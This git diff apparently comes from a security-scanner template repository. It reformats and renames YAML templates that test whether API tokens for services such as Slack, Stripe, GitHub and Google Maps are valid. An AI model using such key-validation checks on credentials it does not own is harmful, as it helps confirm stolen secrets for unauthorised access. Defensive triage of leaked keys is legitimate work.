--git a/apis/googletimezone.yaml b/apis/googletimezone.yaml index 57db4646be..ef16bc6f14 100644 --- a/apis/googletimezone.yaml +++ b/apis/googletimezone.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/hubspot.yaml b/apis/hubspot.yaml index 84ac4ed5de..cdd9d3fdbb 100644 --- a/apis/hubspot.yaml +++ b/apis/hubspot.yaml @@ -12,7 +12,6 @@ requests: path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/instagram.yaml b/apis/instagram.yaml index 885a144e89..261a5f1e71 100644 --- a/apis/instagram.yaml +++ b/apis/instagram.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" - headers: matchers: - type: status status: diff --git a/apis/ipstack.yaml b/apis/ipstack.yaml index 1cb3599066..6051b48d6e 100644 --- a/apis/ipstack.yaml +++ b/apis/ipstack.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/loqate.yaml b/apis/loqate.yaml index 4cad66efea..a2497f8487 100644 --- a/apis/loqate.yaml +++ b/apis/loqate.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" - headers: matchers: - type: word part: body diff --git a/apis/mapbox.yaml b/apis/mapbox.yaml index f4dc3ea1a2..0d5536d218 100644 --- a/apis/mapbox.yaml +++ b/apis/mapbox.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" - headers: matchers: - type: status status: diff --git a/apis/npm.yaml b/apis/npm.yaml index 415f1ac2c5..ac572f64cd 100644 --- a/apis/npm.yaml +++ b/apis/npm.yaml @@ -9,13 +9,10 @@ info: requests: - method: GET - - path: - "https://registry.npmjs.org/-/whoami" headers: Authorization: Bearer {{token}} - matchers: - type: status status: diff --git a/apis/openweather.yaml b/apis/openweather.yaml index 28828cddbf..b016c21ba4 100644 --- a/apis/openweather.yaml +++ b/apis/openweather.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" - headers: matchers: - type: status status: diff --git a/apis/wakatime.yaml b/apis/wakatime.yaml index f4d50d0e21..d3682c3708 100644 --- a/apis/wakatime.yaml +++ b/apis/wakatime.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" - headers: matchers: - type: status status: diff --git a/apis/youtube.yaml b/apis/youtube.yaml index 48cda6e7cb..e348402b76 100644 --- a/apis/youtube.yaml +++ b/apis/youtube.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - headers: matchers-condition: or matchers: - type: word From 44f18b3b382395a6ca69a6ca85a84cbfbc6e8391 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 2 Oct 2021 02:16:16 +0530 Subject: [PATCH 2692/4083] misc update --- apis/asana.yaml | 1 + apis/bingmaps.yaml | 1 + apis/bitly.yaml | 1 + apis/buildkite.yaml | 1 + apis/buttercms.yaml | 1 + apis/calendly.yaml | 1 + apis/circleci.yaml | 1 + apis/deviantart.yaml | 1 + apis/dropbox.yaml | 1 + apis/github.yaml | 1 + apis/{googleautocomplete.yaml => google-autocomplete.yaml} | 1 + apis/{googlecustomsearch.yaml => google-customsearch.yaml} | 1 + apis/{googledirections.yaml => google-directions.yaml} | 1 + apis/{googleelevation.yaml => google-elevation.yaml} | 1 + apis/{googlefcm.yaml => google-fcm.yaml} | 1 + ...ooglefindplacefromtext.yaml => google-findplacefromtext.yaml} | 1 + ...{googlegedistancematrix.yaml => google-gedistancematrix.yaml} | 1 + apis/{googlegeocode.yaml => google-geocode.yaml} | 1 + apis/{googlegeolocation.yaml => google-geolocation.yaml} | 1 + apis/{googlemapsembed.yaml => google-mapsembed.yaml} | 1 + ...ooglemapsembedadvanced.yaml => google-mapsembedadvanced.yaml} | 1 + apis/{googlenearbysearch.yaml => google-nearbysearch.yaml} | 1 + apis/{googlenearestroads.yaml => google-nearestroads.yaml} | 1 + apis/{googleplacedetails.yaml => google-placedetails.yaml} | 1 + apis/{googleplacesphoto.yaml => google-placesphoto.yaml} | 1 + ...oogleplayablelocations.yaml => google-playablelocations.yaml} | 1 + apis/{googleroutetotraveled.yaml => google-routetotraveled.yaml} | 1 + apis/{googlespeedlimit.yaml => google-speedlimit.yaml} | 1 + apis/{googlestaticmaps.yaml => google-staticmaps.yaml} | 1 + apis/{googlestreetview.yaml => google-streetview.yaml} | 1 + apis/{googletimezone.yaml => google-timezone.yaml} | 1 + ...{googletextsearchplaces.yaml => googlet-extsearchplaces.yaml} | 1 + apis/heroku.yaml | 1 + apis/hubspot.yaml | 1 + apis/instagram.yaml | 1 + apis/ipstack.yaml | 1 + apis/iterable.yaml | 1 + apis/jumpcloud.yaml | 1 + apis/lokalise.yaml | 1 + apis/loqate.yaml | 1 + apis/mailchimp.yaml | 1 + apis/mailgun.yaml | 1 + apis/mapbox.yaml | 1 + apis/nerdgraph.yaml | 1 + apis/npm.yaml | 1 + apis/openweather.yaml | 1 + apis/pagerduty.yaml | 1 + apis/pendo.yaml | 1 + apis/pivotaltracker.yaml | 1 + apis/postmark.yaml | 1 + apis/sendgrid.yaml | 1 + apis/slack.yaml | 1 + apis/sonarcloud.yaml | 1 + apis/spotify.yaml | 1 + apis/square.yaml | 1 + apis/stripe.yaml | 1 + apis/tinypng.yaml | 1 + apis/travisci.yaml | 1 + apis/twitter.yaml | 1 + apis/visualstudio.yaml | 1 + apis/wakatime.yaml | 1 + apis/weglot.yaml | 1 + apis/youtube.yaml | 1 + 63 files changed, 63 insertions(+) rename apis/{googleautocomplete.yaml => google-autocomplete.yaml} (99%) rename apis/{googlecustomsearch.yaml => google-customsearch.yaml} (99%) rename apis/{googledirections.yaml => google-directions.yaml} (99%) rename apis/{googleelevation.yaml => google-elevation.yaml} (99%) rename apis/{googlefcm.yaml => google-fcm.yaml} (99%) rename apis/{googlefindplacefromtext.yaml => google-findplacefromtext.yaml} (99%) rename apis/{googlegedistancematrix.yaml => google-gedistancematrix.yaml} (99%) rename apis/{googlegeocode.yaml => google-geocode.yaml} (99%) rename apis/{googlegeolocation.yaml => google-geolocation.yaml} (99%) rename apis/{googlemapsembed.yaml => google-mapsembed.yaml} (99%) rename apis/{googlemapsembedadvanced.yaml => google-mapsembedadvanced.yaml} (99%) rename apis/{googlenearbysearch.yaml => google-nearbysearch.yaml} (99%) rename apis/{googlenearestroads.yaml => google-nearestroads.yaml} (99%) rename apis/{googleplacedetails.yaml => google-placedetails.yaml} (99%) rename apis/{googleplacesphoto.yaml => google-placesphoto.yaml} (99%) rename apis/{googleplayablelocations.yaml => google-playablelocations.yaml} (99%) rename apis/{googleroutetotraveled.yaml => google-routetotraveled.yaml} (99%) rename apis/{googlespeedlimit.yaml => google-speedlimit.yaml} (99%) rename apis/{googlestaticmaps.yaml => google-staticmaps.yaml} (99%) rename apis/{googlestreetview.yaml => google-streetview.yaml} (99%) rename apis/{googletimezone.yaml => google-timezone.yaml} (99%) rename apis/{googletextsearchplaces.yaml => googlet-extsearchplaces.yaml} (99%) diff --git a/apis/asana.yaml b/apis/asana.yaml index 50b6ca587f..2fe0f49393 100644 --- a/apis/asana.yaml +++ b/apis/asana.yaml @@ -13,6 +13,7 @@ requests: - "https://app.asana.com/api/1.0/users/me" headers: Authorization: Bearer {{token}} + matchers: - type: status status: diff --git a/apis/bingmaps.yaml b/apis/bingmaps.yaml index 2045fd7554..c67715bde2 100644 --- a/apis/bingmaps.yaml +++ b/apis/bingmaps.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" + matchers: - type: word part: body diff --git a/apis/bitly.yaml b/apis/bitly.yaml index 56edf06e97..09f5ff0e7c 100644 --- a/apis/bitly.yaml +++ b/apis/bitly.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" + matchers: - type: word part: body diff --git a/apis/buildkite.yaml b/apis/buildkite.yaml index b482af9a04..b2b80424b9 100644 --- a/apis/buildkite.yaml +++ b/apis/buildkite.yaml @@ -13,6 +13,7 @@ requests: - "https://api.buildkite.com/v2/user" headers: Authorization: Bearer {{token}} + matchers: - type: status status: diff --git a/apis/buttercms.yaml b/apis/buttercms.yaml index 1b3c0a47e8..180c40b0d8 100644 --- a/apis/buttercms.yaml +++ b/apis/buttercms.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" + matchers: - type: status status: diff --git a/apis/calendly.yaml b/apis/calendly.yaml index f2725c0456..a1d104c013 100644 --- a/apis/calendly.yaml +++ b/apis/calendly.yaml @@ -13,6 +13,7 @@ requests: - "https://calendly.com/api/v1/users/me" headers: X-Token: "{{token}}" + matchers: - type: status status: diff --git a/apis/circleci.yaml b/apis/circleci.yaml index 0a77779137..ed9810615a 100644 --- a/apis/circleci.yaml +++ b/apis/circleci.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" + matchers: - type: status status: diff --git a/apis/deviantart.yaml b/apis/deviantart.yaml index 94b32417ab..3b0459d16c 100644 --- a/apis/deviantart.yaml +++ b/apis/deviantart.yaml @@ -12,6 +12,7 @@ requests: path: - "https://www.deviantart.com/api/v1/oauth2/placebo" body: "access_token={{token}}" + matchers: - type: word part: body diff --git a/apis/dropbox.yaml b/apis/dropbox.yaml index 0d0e862dce..4af40f9088 100644 --- a/apis/dropbox.yaml +++ b/apis/dropbox.yaml @@ -13,6 +13,7 @@ requests: - "https://api.dropboxapi.com/2/users/get_current_account" headers: Authorization: Bearer {{token}} + matchers: - type: status status: diff --git a/apis/github.yaml b/apis/github.yaml index a08cc0832b..3e2b534c3b 100644 --- a/apis/github.yaml +++ b/apis/github.yaml @@ -13,6 +13,7 @@ requests: - "https://api.github.com/user" headers: Authorization: Basic {{base64('user:' + token)}} + matchers: - type: word part: body diff --git a/apis/googleautocomplete.yaml b/apis/google-autocomplete.yaml similarity index 99% rename from apis/googleautocomplete.yaml rename to apis/google-autocomplete.yaml index abcfedc639..1752f7cb58 100644 --- a/apis/googleautocomplete.yaml +++ b/apis/google-autocomplete.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googlecustomsearch.yaml b/apis/google-customsearch.yaml similarity index 99% rename from apis/googlecustomsearch.yaml rename to apis/google-customsearch.yaml index e59e03edb3..480967da60 100644 --- a/apis/googlecustomsearch.yaml +++ b/apis/google-customsearch.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googledirections.yaml b/apis/google-directions.yaml similarity index 99% rename from apis/googledirections.yaml rename to apis/google-directions.yaml index 65236a5630..471b96270c 100644 --- a/apis/googledirections.yaml +++ b/apis/google-directions.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googleelevation.yaml b/apis/google-elevation.yaml similarity index 99% rename from apis/googleelevation.yaml rename to apis/google-elevation.yaml index bd7ef895c5..1617b15298 100644 --- a/apis/googleelevation.yaml +++ b/apis/google-elevation.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googlefcm.yaml b/apis/google-fcm.yaml similarity index 99% rename from apis/googlefcm.yaml rename to apis/google-fcm.yaml index d5c62731fc..6add1c6af0 100644 --- a/apis/googlefcm.yaml +++ b/apis/google-fcm.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: key={{token}} Content-Type: application/json + matchers: - type: status status: diff --git a/apis/googlefindplacefromtext.yaml b/apis/google-findplacefromtext.yaml similarity index 99% rename from apis/googlefindplacefromtext.yaml rename to apis/google-findplacefromtext.yaml index 0976a79a37..b856715d5b 100644 --- a/apis/googlefindplacefromtext.yaml +++ b/apis/google-findplacefromtext.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googlegedistancematrix.yaml b/apis/google-gedistancematrix.yaml similarity index 99% rename from apis/googlegedistancematrix.yaml rename to apis/google-gedistancematrix.yaml index ceab537ca0..df37bed58a 100644 --- a/apis/googlegedistancematrix.yaml +++ b/apis/google-gedistancematrix.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googlegeocode.yaml b/apis/google-geocode.yaml similarity index 99% rename from apis/googlegeocode.yaml rename to apis/google-geocode.yaml index 204031fd34..75b5069d7c 100644 --- a/apis/googlegeocode.yaml +++ b/apis/google-geocode.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googlegeolocation.yaml b/apis/google-geolocation.yaml similarity index 99% rename from apis/googlegeolocation.yaml rename to apis/google-geolocation.yaml index 3dd6766951..d20eb129e0 100644 --- a/apis/googlegeolocation.yaml +++ b/apis/google-geolocation.yaml @@ -11,6 +11,7 @@ requests: path: - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" matchers-condition: and + matchers: - type: word part: body diff --git a/apis/googlemapsembed.yaml b/apis/google-mapsembed.yaml similarity index 99% rename from apis/googlemapsembed.yaml rename to apis/google-mapsembed.yaml index 35c549d87f..6d94d1f8c6 100644 --- a/apis/googlemapsembed.yaml +++ b/apis/google-mapsembed.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" + matchers: - type: status status: diff --git a/apis/googlemapsembedadvanced.yaml b/apis/google-mapsembedadvanced.yaml similarity index 99% rename from apis/googlemapsembedadvanced.yaml rename to apis/google-mapsembedadvanced.yaml index 6815b9aaf2..54897376d7 100644 --- a/apis/googlemapsembedadvanced.yaml +++ b/apis/google-mapsembedadvanced.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" + matchers: - type: status status: diff --git a/apis/googlenearbysearch.yaml b/apis/google-nearbysearch.yaml similarity index 99% rename from apis/googlenearbysearch.yaml rename to apis/google-nearbysearch.yaml index 78db51e9c8..95fecf43c2 100644 --- a/apis/googlenearbysearch.yaml +++ b/apis/google-nearbysearch.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googlenearestroads.yaml b/apis/google-nearestroads.yaml similarity index 99% rename from apis/googlenearestroads.yaml rename to apis/google-nearestroads.yaml index 1dd7f6e8be..1e24f7e04d 100644 --- a/apis/googlenearestroads.yaml +++ b/apis/google-nearestroads.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googleplacedetails.yaml b/apis/google-placedetails.yaml similarity index 99% rename from apis/googleplacedetails.yaml rename to apis/google-placedetails.yaml index 23b2d293da..cd40c956a2 100644 --- a/apis/googleplacedetails.yaml +++ b/apis/google-placedetails.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googleplacesphoto.yaml b/apis/google-placesphoto.yaml similarity index 99% rename from apis/googleplacesphoto.yaml rename to apis/google-placesphoto.yaml index b2ecc55be0..1df3d91138 100644 --- a/apis/googleplacesphoto.yaml +++ b/apis/google-placesphoto.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}" + matchers: - type: status status: diff --git a/apis/googleplayablelocations.yaml b/apis/google-playablelocations.yaml similarity index 99% rename from apis/googleplayablelocations.yaml rename to apis/google-playablelocations.yaml index 1f192e65a5..370811d7c4 100644 --- a/apis/googleplayablelocations.yaml +++ b/apis/google-playablelocations.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}" + matchers: - type: word part: body diff --git a/apis/googleroutetotraveled.yaml b/apis/google-routetotraveled.yaml similarity index 99% rename from apis/googleroutetotraveled.yaml rename to apis/google-routetotraveled.yaml index c3f197ec99..c943449c3e 100644 --- a/apis/googleroutetotraveled.yaml +++ b/apis/google-routetotraveled.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googlespeedlimit.yaml b/apis/google-speedlimit.yaml similarity index 99% rename from apis/googlespeedlimit.yaml rename to apis/google-speedlimit.yaml index cc52b5167f..240c951616 100644 --- a/apis/googlespeedlimit.yaml +++ b/apis/google-speedlimit.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googlestaticmaps.yaml b/apis/google-staticmaps.yaml similarity index 99% rename from apis/googlestaticmaps.yaml rename to apis/google-staticmaps.yaml index 0036fb01b7..0656e26f34 100644 --- a/apis/googlestaticmaps.yaml +++ b/apis/google-staticmaps.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" + matchers: - type: status status: diff --git a/apis/googlestreetview.yaml b/apis/google-streetview.yaml similarity index 99% rename from apis/googlestreetview.yaml rename to apis/google-streetview.yaml index 449bee3291..11037b39d6 100644 --- a/apis/googlestreetview.yaml +++ b/apis/google-streetview.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}" + matchers: - type: status status: diff --git a/apis/googletimezone.yaml b/apis/google-timezone.yaml similarity index 99% rename from apis/googletimezone.yaml rename to apis/google-timezone.yaml index ef16bc6f14..45227bc761 100644 --- a/apis/googletimezone.yaml +++ b/apis/google-timezone.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}" + matchers: - type: word part: body diff --git a/apis/googletextsearchplaces.yaml b/apis/googlet-extsearchplaces.yaml similarity index 99% rename from apis/googletextsearchplaces.yaml rename to apis/googlet-extsearchplaces.yaml index 0331c9c039..e5e6d49a7a 100644 --- a/apis/googletextsearchplaces.yaml +++ b/apis/googlet-extsearchplaces.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}" + matchers: - type: word part: body diff --git a/apis/heroku.yaml b/apis/heroku.yaml index e56f5d0b84..c90ca9e09f 100644 --- a/apis/heroku.yaml +++ b/apis/heroku.yaml @@ -14,6 +14,7 @@ requests: headers: Accept: application/vnd.heroku+json; version=3 Authorization: Bearer {{token}} + matchers: - type: status status: diff --git a/apis/hubspot.yaml b/apis/hubspot.yaml index cdd9d3fdbb..7212dc3fa0 100644 --- a/apis/hubspot.yaml +++ b/apis/hubspot.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" + matchers: - type: word part: body diff --git a/apis/instagram.yaml b/apis/instagram.yaml index 261a5f1e71..6022203c41 100644 --- a/apis/instagram.yaml +++ b/apis/instagram.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" + matchers: - type: status status: diff --git a/apis/ipstack.yaml b/apis/ipstack.yaml index 6051b48d6e..d3ef60d523 100644 --- a/apis/ipstack.yaml +++ b/apis/ipstack.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" + matchers: - type: word part: body diff --git a/apis/iterable.yaml b/apis/iterable.yaml index a3ed3acc45..9b4df40127 100644 --- a/apis/iterable.yaml +++ b/apis/iterable.yaml @@ -13,6 +13,7 @@ requests: - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" headers: Api_Key: "{{token}}" + matchers: - type: word part: body diff --git a/apis/jumpcloud.yaml b/apis/jumpcloud.yaml index 2fcb42f44b..2f061c8e5a 100644 --- a/apis/jumpcloud.yaml +++ b/apis/jumpcloud.yaml @@ -13,6 +13,7 @@ requests: - "https://console.jumpcloud.com/api/systems" headers: X-Api-Key: "{{token}}" + matchers: - type: word part: body diff --git a/apis/lokalise.yaml b/apis/lokalise.yaml index c99f3e53d4..e13f8ac382 100644 --- a/apis/lokalise.yaml +++ b/apis/lokalise.yaml @@ -13,6 +13,7 @@ requests: - "https://api.lokalise.com/api2/projects/" headers: X-Api-Token: "{{token}}" + matchers: - type: status status: diff --git a/apis/loqate.yaml b/apis/loqate.yaml index a2497f8487..3ce25928dd 100644 --- a/apis/loqate.yaml +++ b/apis/loqate.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" + matchers: - type: word part: body diff --git a/apis/mailchimp.yaml b/apis/mailchimp.yaml index e308a4ee35..64443cccdb 100644 --- a/apis/mailchimp.yaml +++ b/apis/mailchimp.yaml @@ -13,6 +13,7 @@ network: read: 1024 host: - "tls://smtp.mandrillapp.com:465" + matchers: - type: word words: diff --git a/apis/mailgun.yaml b/apis/mailgun.yaml index 6e01dfc5b4..4a14c40124 100644 --- a/apis/mailgun.yaml +++ b/apis/mailgun.yaml @@ -13,6 +13,7 @@ requests: - "https://api.mailgun.net/v3/domains" headers: Authorization: Basic {{base64('api:' + token)}} + matchers: - type: status status: diff --git a/apis/mapbox.yaml b/apis/mapbox.yaml index 0d5536d218..13ba4c7ff2 100644 --- a/apis/mapbox.yaml +++ b/apis/mapbox.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" + matchers: - type: status status: diff --git a/apis/nerdgraph.yaml b/apis/nerdgraph.yaml index b9b5faa71b..04d4d1b4a3 100644 --- a/apis/nerdgraph.yaml +++ b/apis/nerdgraph.yaml @@ -15,6 +15,7 @@ requests: Content-Type: application/json API-Key: "{{token}}" body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" + matchers: - type: word part: body diff --git a/apis/npm.yaml b/apis/npm.yaml index ac572f64cd..b7ca0cb98f 100644 --- a/apis/npm.yaml +++ b/apis/npm.yaml @@ -13,6 +13,7 @@ requests: - "https://registry.npmjs.org/-/whoami" headers: Authorization: Bearer {{token}} + matchers: - type: status status: diff --git a/apis/openweather.yaml b/apis/openweather.yaml index b016c21ba4..5ace495d7e 100644 --- a/apis/openweather.yaml +++ b/apis/openweather.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" + matchers: - type: status status: diff --git a/apis/pagerduty.yaml b/apis/pagerduty.yaml index 7e52dae038..b572ed19bc 100644 --- a/apis/pagerduty.yaml +++ b/apis/pagerduty.yaml @@ -14,6 +14,7 @@ requests: headers: Accept: application/vnd.pagerduty+json;version=2 Authorization: Token token={{token}} + matchers: - type: status status: diff --git a/apis/pendo.yaml b/apis/pendo.yaml index b83bb829a7..696696b01d 100644 --- a/apis/pendo.yaml +++ b/apis/pendo.yaml @@ -15,6 +15,7 @@ requests: headers: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" + matchers: - type: status status: diff --git a/apis/pivotaltracker.yaml b/apis/pivotaltracker.yaml index 8b2a5d1248..5f8ce314f1 100644 --- a/apis/pivotaltracker.yaml +++ b/apis/pivotaltracker.yaml @@ -13,6 +13,7 @@ requests: - "https://www.pivotaltracker.com/services/v5/me" headers: X-TrackerToken: "{{token}}" + matchers: - type: word part: body diff --git a/apis/postmark.yaml b/apis/postmark.yaml index 83ec2ba01c..a061bf63ae 100644 --- a/apis/postmark.yaml +++ b/apis/postmark.yaml @@ -14,6 +14,7 @@ requests: headers: Accept: application/json X-Postmark-Server-Token: "{{token}}" + matchers: - type: status status: diff --git a/apis/sendgrid.yaml b/apis/sendgrid.yaml index 7cc882a115..fa881c48f0 100644 --- a/apis/sendgrid.yaml +++ b/apis/sendgrid.yaml @@ -15,6 +15,7 @@ network: read: 1024 host: - "tls://smtp.sendgrid.net:465" + matchers: - type: word words: diff --git a/apis/slack.yaml b/apis/slack.yaml index cbca7469e2..01b6937ce4 100644 --- a/apis/slack.yaml +++ b/apis/slack.yaml @@ -13,6 +13,7 @@ requests: - "https://slack.com/api/auth.test" headers: Authorization: Bearer {{token}} + matchers: - type: word part: body diff --git a/apis/sonarcloud.yaml b/apis/sonarcloud.yaml index dd7f5ba4f5..61a68b1850 100644 --- a/apis/sonarcloud.yaml +++ b/apis/sonarcloud.yaml @@ -13,6 +13,7 @@ requests: - "https://sonarcloud.io/api/authentication/validate" headers: Authorization: Basic {{base64(token + ':')}} + matchers: - type: word part: body diff --git a/apis/spotify.yaml b/apis/spotify.yaml index 59cdc47c24..3f6cb05a27 100644 --- a/apis/spotify.yaml +++ b/apis/spotify.yaml @@ -13,6 +13,7 @@ requests: - "https://api.spotify.com/v1/me" headers: Authorization: Bearer {{token}} + matchers: - type: status status: diff --git a/apis/square.yaml b/apis/square.yaml index 1c60bf47ec..93fe826fad 100644 --- a/apis/square.yaml +++ b/apis/square.yaml @@ -15,6 +15,7 @@ requests: headers: Content-Type: application/json Authorization: Bearer {{token}} + matchers: - type: word part: body diff --git a/apis/stripe.yaml b/apis/stripe.yaml index c9a3d40ecc..f33b6d1a0b 100644 --- a/apis/stripe.yaml +++ b/apis/stripe.yaml @@ -13,6 +13,7 @@ requests: - "https://api.stripe.com/v1/charges" headers: Authorization: Basic {{base64(token + ':')}} + matchers: - type: status status: diff --git a/apis/tinypng.yaml b/apis/tinypng.yaml index c06163e7f6..9755bbe6b1 100644 --- a/apis/tinypng.yaml +++ b/apis/tinypng.yaml @@ -13,6 +13,7 @@ requests: - "https://api.tinify.com/shrink" headers: Authorization: Basic {{base64('api:' + token)}} + matchers: - type: word part: header diff --git a/apis/travisci.yaml b/apis/travisci.yaml index 7b7390b58d..c41d77e4a1 100644 --- a/apis/travisci.yaml +++ b/apis/travisci.yaml @@ -14,6 +14,7 @@ requests: headers: Travis-API-Version: 3 Authorization: token {{token}} + matchers: - type: status status: diff --git a/apis/twitter.yaml b/apis/twitter.yaml index 238ce5cced..01bc85009f 100644 --- a/apis/twitter.yaml +++ b/apis/twitter.yaml @@ -13,6 +13,7 @@ requests: - "https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json" headers: Authorization: Bearer {{token}} + matchers: - type: word part: body diff --git 